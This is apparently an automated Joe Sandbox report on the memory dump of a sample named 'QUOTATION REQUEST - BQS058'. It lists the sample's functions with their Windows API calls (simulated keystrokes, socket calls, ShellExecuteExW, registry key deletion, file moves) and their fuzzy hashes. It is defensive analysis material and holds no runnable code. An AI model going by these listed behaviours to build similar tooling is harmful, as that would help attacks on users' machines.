Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 1fcf1c9cfd519bb81035f8d78a8f711b86fe6dcce52524e46a73f23ffbcf17f0
Instruction ID: 915719e7844dfe76929f84c03c893c2da92b74f3710856fc725086621cac5395
Opcode Fuzzy Hash: 1fcf1c9cfd519bb81035f8d78a8f711b86fe6dcce52524e46a73f23ffbcf17f0
Instruction Fuzzy Hash: 3C41FD317087809AE7B65B288D88B6B7B93FBA5310F5C854BE18786790C67E9841F790

Function 010370C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 010370DD

Part of subcall function 00FF0DB6: std::exception::exception.LIBCMT ref: 00FF0DEC
Part of subcall function 00FF0DB6: __CxxThrowException@8.LIBCMT ref: 00FF0E01

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 01037114
EnterCriticalSection.KERNEL32(?), ref: 01037130
_memmove.LIBCMT ref: 0103717E
_memmove.LIBCMT ref: 0103719B
LeaveCriticalSection.KERNEL32(?), ref: 010371AA
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 010371BF
InterlockedExchange.KERNEL32(?,000001F6), ref: 010371DE

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 6674d26842f4488b4121ae1c5324a3aca5603e09dccd24eb5c352a361a3ac4bd
Instruction ID: 925195b4e83c94d8e58495f847d79ac48a4f74d0e55678610d1eae5a49b9fe5e
Opcode Fuzzy Hash: 6674d26842f4488b4121ae1c5324a3aca5603e09dccd24eb5c352a361a3ac4bd
Instruction Fuzzy Hash: 1831A376900206EBCF10DFA8DC859AFBBB9EF45310F1440A5EA449B256DB399A10DB60

Function 010561D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 010561EB
GetDC.USER32(00000000), ref: 010561F3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 010561FE
ReleaseDC.USER32(00000000,00000000), ref: 0105620A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 01056246
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 01056257
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0105902A,?,?,000000FF,00000000,?,000000FF,?), ref: 01056291
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 010562B1

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: a2cf56f1dcef5aac9f64cf8832768b6c6df0d4f2a0964fc6b99bf6828a7268b4
Instruction ID: 92ce285cf8fb2e0cb5ea39b3f612e6da27df7a9e0b74231c061d610fc85d2d00
Opcode Fuzzy Hash: a2cf56f1dcef5aac9f64cf8832768b6c6df0d4f2a0964fc6b99bf6828a7268b4
Instruction Fuzzy Hash: 11319F721002107FEB218F64CC8AFEB3FA9EF49761F040055FE88DA191C67A9841CB74

Function 0102BBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0102BBC4
_memcmp.LIBCMT ref: 0102BBE6
_memcmp.LIBCMT ref: 0102BBFE
_memcmp.LIBCMT ref: 0102BC11
_memcmp.LIBCMT ref: 0102BC2B
_memcmp.LIBCMT ref: 0102BC3E
_memcmp.LIBCMT ref: 0102BC56
_memcmp.LIBCMT ref: 0102BC71

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: ec16b1931cde2cf7747c4c0626e3c5bcc0b54bca747e1ab0aba686e699129290
Instruction ID: 7a33d955e3797514b2ba63eb5af1cb990132d630ca8e6f2db2ba2cff51c13717
Opcode Fuzzy Hash: ec16b1931cde2cf7747c4c0626e3c5bcc0b54bca747e1ab0aba686e699129290
Instruction Fuzzy Hash: 9E215B7170122EBBE215B6169D42FFF779CAE61368F084024FF849B647EB68DE10C1A5

Function 0103EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00FD9837: __itow.LIBCMT ref: 00FD9862
Part of subcall function 00FD9837: __swprintf.LIBCMT ref: 00FD98AC

Part of subcall function 00FEFC86: _wcscpy.LIBCMT ref: 00FEFCA9

_wcstok.LIBCMT ref: 0103EC94
_wcscpy.LIBCMT ref: 0103ED23
_memset.LIBCMT ref: 0103ED56

Strings

X, xrefs: 0103ED93

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 4a74f362fc21097b3fd63e6b2ea1ac43eb5c7af6c5a5b84aaea6f537eb78dc81
Instruction ID: 6f67105a132224d6eb6a7fb4a09a26bbe7b294d20df9f9e435675b56f3eac345
Opcode Fuzzy Hash: 4a74f362fc21097b3fd63e6b2ea1ac43eb5c7af6c5a5b84aaea6f537eb78dc81
Instruction Fuzzy Hash: CBC18D315083019FC754FF68C885A6EB7E5AF85310F08496EF9D99B3A2DB74E805DB82

Function 01046B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 01046C00
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 01046C21
WSAGetLastError.WSOCK32(00000000), ref: 01046C34
htons.WSOCK32(?,?,?,00000000,?), ref: 01046CEA
inet_ntoa.WSOCK32(?), ref: 01046CA7

Part of subcall function 0102A7E9: _strlen.LIBCMT ref: 0102A7F3
Part of subcall function 0102A7E9: _memmove.LIBCMT ref: 0102A815

_strlen.LIBCMT ref: 01046D44
_memmove.LIBCMT ref: 01046DAD

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 6ac4e200d1d787f899d2f9800d2d1581579a5fd8825432af2f509e6b7fc443b2
Instruction ID: 500e81da729ad1ece2c40255a82091390eafe8b5d9c6db7e4157835949a9c598
Opcode Fuzzy Hash: 6ac4e200d1d787f899d2f9800d2d1581579a5fd8825432af2f509e6b7fc443b2
Instruction Fuzzy Hash: 4B8100B1508300ABC710FB68CC81E6FB7E9AF85714F04492EF9859B292EB75ED45C792

Function 00FD1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7401265f8ce060daf911d7774785de9027c82f67982f84e138bea707a8be9af2
Instruction ID: 0a8294fc1c8b76e07f143c871f0853a203f688a243c6977612456e1b3fec0412
Opcode Fuzzy Hash: 7401265f8ce060daf911d7774785de9027c82f67982f84e138bea707a8be9af2
Instruction Fuzzy Hash: A1716E35900109FFDB15CF98CC48ABE7B79FF86314F28824AF955AB251C7349A51DB60

Function 0105B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(01578A68), ref: 0105B3EB
IsWindowEnabled.USER32(01578A68), ref: 0105B3F7
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0105B4DB
SendMessageW.USER32(01578A68,000000B0,?,?), ref: 0105B512
IsDlgButtonChecked.USER32(?,?), ref: 0105B54F
GetWindowLongW.USER32(01578A68,000000EC), ref: 0105B571
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0105B589

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: aabd42853ce8917db53e1c1254f98edeb96aaada244d7ccdc15640abed308dcd
Instruction ID: 2786d198689f279fda07ecbc2bccc462c6ba9fdf79ff1d7ef7e3ba32fd9affe4
Opcode Fuzzy Hash: aabd42853ce8917db53e1c1254f98edeb96aaada244d7ccdc15640abed308dcd
Instruction Fuzzy Hash: CF715E34604205AFEFB59E59C894BABBFE6FF09300F144099EEC597252CB36B941DB50

Function 0104F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0104F448
_memset.LIBCMT ref: 0104F511
ShellExecuteExW.SHELL32(?), ref: 0104F556

Part of subcall function 00FD9837: __itow.LIBCMT ref: 00FD9862
Part of subcall function 00FD9837: __swprintf.LIBCMT ref: 00FD98AC

Part of subcall function 00FEFC86: _wcscpy.LIBCMT ref: 00FEFCA9

GetProcessId.KERNEL32(00000000), ref: 0104F5CD
CloseHandle.KERNEL32(00000000), ref: 0104F5FC

Strings

@, xrefs: 0104F525

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 122fe4fdc140be24c6b43133e896ad5fb305a1f517ad35d1ff5a0ac6588408f6
Instruction ID: 76ebed73ce5d8bb4ff9a69bded1b45359fab36d2bc09e77b8cd80e53b4b7f4a2
Opcode Fuzzy Hash: 122fe4fdc140be24c6b43133e896ad5fb305a1f517ad35d1ff5a0ac6588408f6
Instruction Fuzzy Hash: F261A5B5A00619DFCB14EF98C8819AEBBF5FF48310F184069E955AB351CB74AD41DF90

Function 01030F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 01030F8C
GetKeyboardState.USER32(?), ref: 01030FA1
SetKeyboardState.USER32(?), ref: 01031002
PostMessageW.USER32(?,00000101,00000010,?), ref: 01031030
PostMessageW.USER32(?,00000101,00000011,?), ref: 0103104F
PostMessageW.USER32(?,00000101,00000012,?), ref: 01031095
PostMessageW.USER32(?,00000101,0000005B,?), ref: 010310B8

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 6603e6b6c11cd617e2427c3c853c564e6a8ec602088e32cd728bc82ed57e6051
Instruction ID: 94036b1de6ad588c988f3b4e2427de56fd8d65cb7d6a6f35e5682fc9f02000af
Opcode Fuzzy Hash: 6603e6b6c11cd617e2427c3c853c564e6a8ec602088e32cd728bc82ed57e6051
Instruction Fuzzy Hash: DA51C3B06047D63DFB3642388845BBABEED5B8A304F0885C9F2D5468D3C2E9E8D4D751

Function 01030D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 01030DA5
GetKeyboardState.USER32(?), ref: 01030DBA
SetKeyboardState.USER32(?), ref: 01030E1B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 01030E47
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 01030E64
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 01030EA8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 01030EC9

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: f446fc98a621f6f08ba018383586acc0c2297b859f1597940bdcd80e0434bd33
Instruction ID: 240d085fabe19961625fa3b4ca72233e9821e0990d285d50eb778ee45896f108
Opcode Fuzzy Hash: f446fc98a621f6f08ba018383586acc0c2297b859f1597940bdcd80e0434bd33
Instruction Fuzzy Hash: CC51E6A06467D63DFB7692388C45BBA7FED5F86300F0884C9F2D4468C6D395E898D760

Function 010355FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0103560A
_wcsncpy.LIBCMT ref: 0103563F
_wcsncpy.LIBCMT ref: 01035671
_wcsncpy.LIBCMT ref: 010356A4
_wcsncpy.LIBCMT ref: 010356E6
_wcsncpy.LIBCMT ref: 01035720
_wcsncpy.LIBCMT ref: 0103574F

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 9fac40ba25e33a3655914bf6aeb1234f86b32f789c7e8d1318347563450b7c85
Instruction ID: 7bf2a05b830d0ce6ca49d33dba2a5fa93c06b73aeb7fa891dfabedbda47eafcb
Opcode Fuzzy Hash: 9fac40ba25e33a3655914bf6aeb1234f86b32f789c7e8d1318347563450b7c85
Instruction Fuzzy Hash: 9141B365C1121876CB11EBF49C4A9EFB7BCAF44310F448856E749E3231EA38E345D7AA

Function 01033671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0103466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,01033697,?), ref: 0103468B

Part of subcall function 0103466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,01033697,?), ref: 010346A4

lstrcmpiW.KERNEL32(?,?), ref: 010336B7
_wcscmp.LIBCMT ref: 010336D3
MoveFileW.KERNEL32(?,?), ref: 010336EB
_wcscat.LIBCMT ref: 01033733
SHFileOperationW.SHELL32(?), ref: 0103379F

Strings

\*.*, xrefs: 0103372D

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: f6e905bac4388462ae3d63481ffb08ee63cd34912eeba697c0fe2e89a3dfada3
Instruction ID: 0fce94206bbfeb95bba7c0863887ed8f2514d7a3f0323f077a93284c9aa38f78
Opcode Fuzzy Hash: f6e905bac4388462ae3d63481ffb08ee63cd34912eeba697c0fe2e89a3dfada3
Instruction Fuzzy Hash: 01418E71508345AED762EF64D4859DFB7ECBFC8280F00486EB5CAC7251EA38D289C752

Function 01057291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 010572AA
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01057351
IsMenu.USER32(?), ref: 01057369
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 010573B1
DrawMenuBar.USER32 ref: 010573C4

Strings

0, xrefs: 0105729E

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 4373b766b720beaf8bf20114798edeb83a5d2171963f399468a87de5148a331e
Instruction ID: 701633a516bb46638f857b37cbaa62db2514f42d20940f403fad152cdba756f9
Opcode Fuzzy Hash: 4373b766b720beaf8bf20114798edeb83a5d2171963f399468a87de5148a331e
Instruction Fuzzy Hash: 99417671A00209EFDB61CF54D885AAABBF8FF08360F448069FE85AB251C735AD04EF50

Function 01050FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 01050FD4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 01050FFE
FreeLibrary.KERNEL32(00000000), ref: 010510B5

Part of subcall function 01050FA5: RegCloseKey.ADVAPI32(?), ref: 0105101B
Part of subcall function 01050FA5: FreeLibrary.KERNEL32(?), ref: 0105106D
Part of subcall function 01050FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 01051090

RegDeleteKeyW.ADVAPI32(?,?), ref: 01051058

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: f89b6185d9d64cf24cef70d4622eb2f5fbfa3291689e18f60719f54f0a3ca89b
Instruction ID: 801375ef34c4c15bc973c77ed1cd736cb355fa6d34df6b3aff7463bfc2470f12
Opcode Fuzzy Hash: f89b6185d9d64cf24cef70d4622eb2f5fbfa3291689e18f60719f54f0a3ca89b
Instruction Fuzzy Hash: BF310F71A01209BFEB659F94DC89EFFBBBCEF08310F0411A9F941A2140DA759A459BA0

Function 010562CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 010562EC
GetWindowLongW.USER32(01578A68,000000F0), ref: 0105631F
GetWindowLongW.USER32(01578A68,000000F0), ref: 01056354
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 01056386
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 010563B0
GetWindowLongW.USER32(00000000,000000F0), ref: 010563C1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 010563DB

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 87c34c5c744eba692d20ebc00d2336f5d056cbe765dc43dd46ea9d2c543580ef
Instruction ID: 4f7ee094fc5886be22e841ab0d22427fe5d39f60de10d8cfce7d4902ed4e5753
Opcode Fuzzy Hash: 87c34c5c744eba692d20ebc00d2336f5d056cbe765dc43dd46ea9d2c543580ef
Instruction Fuzzy Hash: 1D313730600241AFDBB2CF29D894F563BE1FB4A754F5841A4F9919F2B6CB77A840CB50

Function 0102DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0102DB2E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0102DB54
SysAllocString.OLEAUT32(00000000), ref: 0102DB57
SysAllocString.OLEAUT32(?), ref: 0102DB75
SysFreeString.OLEAUT32(?), ref: 0102DB7E
StringFromGUID2.OLE32(?,?,00000028), ref: 0102DBA3
SysAllocString.OLEAUT32(?), ref: 0102DBB1

Memory Dump Source

